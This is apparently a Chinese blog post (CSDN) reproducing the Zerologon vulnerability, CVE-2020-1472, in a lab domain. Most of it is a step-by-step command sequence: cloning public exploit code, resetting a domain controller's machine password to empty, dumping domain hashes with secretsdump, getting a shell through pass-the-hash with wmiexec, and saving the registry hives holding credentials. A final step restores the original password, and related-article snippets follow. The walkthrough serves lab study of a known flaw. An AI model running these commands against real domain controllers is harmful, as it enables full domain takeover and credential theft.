CVE-2020-1472复现

最新推荐文章于 2021-07-08 15:47:11 发布
最新推荐文章于 2021-07-08 15:47:11 发布
阅读量268 收藏
点赞数 2
分类专栏:
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44216796/article/details/112055226
版权

域环境搭建

环境:windows server 2019

在这里插入图片描述

下一步等待安装完成。
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

漏洞验证

使用如下命令进行验证:

git clone https://github.com/SecuraBV/CVE-2020-1472
cd CVE-2020-1472
python3 -m pip install -r requirements.txt
python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR

出现下图提示证明存在该漏洞:
在这里插入图片描述

漏洞利用

安装Impacket

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install .

下载EXP

# ~/impacket/
cd examples
git clone https://github.com/dirkjanm/CVE-2020-1472
cd CVE-2020-1472

置空密码

# ~impacket/examples/CVE-2020-1472
python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR

在这里插入图片描述
这时候密码已经置空

注意:对域控服务器有影响,谨慎使用

获取HASH

接下来我们通过secretsdump.py根据DRS协议来获取相关的HASH,这里注意Windows用户在终端中的命令无需转义。

~impacket/examples/

# windows
python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass
# others
python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

在这里插入图片描述

获取SHELL

获取到HASH之后接下来我们就可以利用wmiexec.py登录,从而获取一个SHELL

~impacket/examples/

python3 wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

在这里插入图片描述

获取原HASH

获取SHELL后我们执行以下命令,导出SAM中原来的HASH

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

在这里插入图片描述

解析HASH

执行如下命令,利用secretsdump.py解析保存在本地的nt hash

# ~impacket/examples

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

然后我们保存上图中红框部分,即

# ORI_HASH

1137237a2d7ad836d83e4da7xxxxx676c

恢复HASH

# ~impacket/examples/zerologon

git clone https://github.com/risksense/zerologon
cd zerologon
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

在这里插入图片描述

检查是否恢复

我们这时候再用获取HASH时测试一下是否已经已经恢复

# ~/impacket/examples

python3 secretsdump.py test.com/user:password@DC_IP_ADDR -just-dc-user 'DC_NETBIOS_NAME$'

在这里插入图片描述

AZ09WY
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(上)
systemino的博客
10-27 3716
本文将从攻防角度对CVE-2020-1472进行一个简单的介绍,并对如何检测和修复ZeroLogon提出具体建议。 什么是ZeroLogon? Netlogon远程协议(也称为MS-NRPC)是一个远程进程调用(RPC)接口,仅由连接到域的设备使用。 MS-NRPC包括身份验证方法和建立Netlogon安全通道的方法。这些更新强制指定的Netlogon客户端行为,以便在成员计算机和Active Directory (AD)域控制器(DC)之间使用带有Netlogon安全通道的安全RPC。 Zero..
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8080
多次跳转导致的ssrf
Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证
smellycat000的专栏
09-16 1362
聚焦源代码安全,网罗国内外最新资讯!漏洞简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的...
cve-2020-1938复现
热门推荐
梦之序章的博客
02-21 1万+
一、 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,其安装后会默认开启ajp连接器,方便与其他web服务器通过ajp协议进行交互。属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。...
CVE-2020-7471漏洞复现
qq_41260930的博客
02-13 6023
文章目录1. CVE-2020-7471漏洞复现1.1. 漏洞简介1.2. 漏洞影响范围1.3. 漏洞环境搭建(parrot 5.3.0-3parrot3-amd64)1.3.1. 安装 django 漏洞版本(测试使用版本为3.0.2)1.3.2. 安装postgres 数据库1.3.3. 创建测试数据库test1.3.4. 下载CVE-2020-7471到本地1.3.5. 修改配置文件1.3....
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞(CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补域控制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的域控制器,请如下
CVE-2020-1472域内提权漏洞复现
whojoe的博客
07-08 692
CVE-2020-1472域内提权漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取域管密码1获取域控机器密码1获取域控机器密码2恢复域控密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
CVE-2020-1472 域内提权复现
weixin_39811856的博客
09-22 465
1.利用流程 漏洞利用 流程如下: 1、 置空域控保存在AD中的密码 2、 获取域控用户HASH 3、通过获取到的管理员HASH得到一个SHELL 2.安装最新的impacket: https://github.com/SecureAuthCorp/impacket 注意:不要下载tags里面的,tags里面还是3月份的! 3.漏洞利用: 1)置空(置空的不是管理员账号密码) 2)使用空密码dump域控上的hash 如图: WIN-I0E7JQ4II7A$用户hash已被替..
CVE-2020-11651复现
weixin_44576411的博客
12-23 522
CVE-2020-11651(身份验证绕过漏洞) 简述 漏洞原因: SaltStack是python的架构开发工具 但是它的ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,而且还会暴露_prep_auth_info()方法。 漏洞使用方法 攻击者可以通过构造恶意请求,绕过salt master 的验证逻辑,调用相关的未授权功能,从而造成远程命令执行漏洞。 ClearFuncs类处理未经身份验证的请求,并且无意中公开了_send_pub()方法,该方法可用于直接在master服务器上
【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)处置手册
爱国小白帽
03-14 2298
【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)处置手册 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 昨天 通告编号:NS-2020-0017-1 2020-03-13 TAG: SMBv3、远程代码执行、CVE-2020-0796 漏洞等级: 高,可导致远程代码执行,易被蠕虫利用传播恶意程序。 应急等级: 黄...
[转](70)内核重载 xp sp3 x86 单核
weixin_41875267的博客
11-25 190
一、项目说明 这次项目是这样设计的,首先 inline hook NtTerminateProcess 函数,使其他进程不能关闭受保护的进程,这里选择记事本。 然后编写一个普通的程序,调用 TerminateProcess 函数关闭记事本,如无意外是关不掉的。 然后编写驱动,重载内核,HOOK KiFastCallEntry 函数,让我们的程序系统调用走新内核,这样就可以关掉记事本了。 二、知识回顾 KiFastCallEntry 我们已经逆向分析...
CVE-2019-15107_WEBMIN_RCE漏洞复现
dust_hk的博客
08-23 1807
0x00 简介 Webmin是一个基于Web的界面,用于Unix的系统管理。使用任何现代Web浏览器,您可以设置用户帐户,Apache,DNS,文件共享等等。Webmin无需手动编辑/ etc / passwd等 Unix配置文件,并允许您从控制台或远程管理系统。Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前...
CVE-2020-2883漏洞复现
锋刃科技的博客
09-12 1876
影响版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 环境搭建 我这里使用得是12.1.3.0.0 选择第三个选项,其他默认 Your-IP:7001/console打开网站即可 Poc地址:https://github.com/zhzyker/exphu
Django SQL注入漏洞(CVE-2020-7471)复现
锋刃科技的博客
08-01 2812
简介 Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义并注入恶意SQL语句。 影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 环境搭建 ..
CVE-2020-16875复现
最新发布
09-14
为了复现CVE-2020-16875漏洞,您可以按照以下步骤进行操作: 1. 首先,您需要获取漏洞的POC代码。根据引用提供的信息,您可以从https://srcincite.io/pocs/cve-2020-16875.py.txt下载POC代码。 2. 在获得POC代码后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值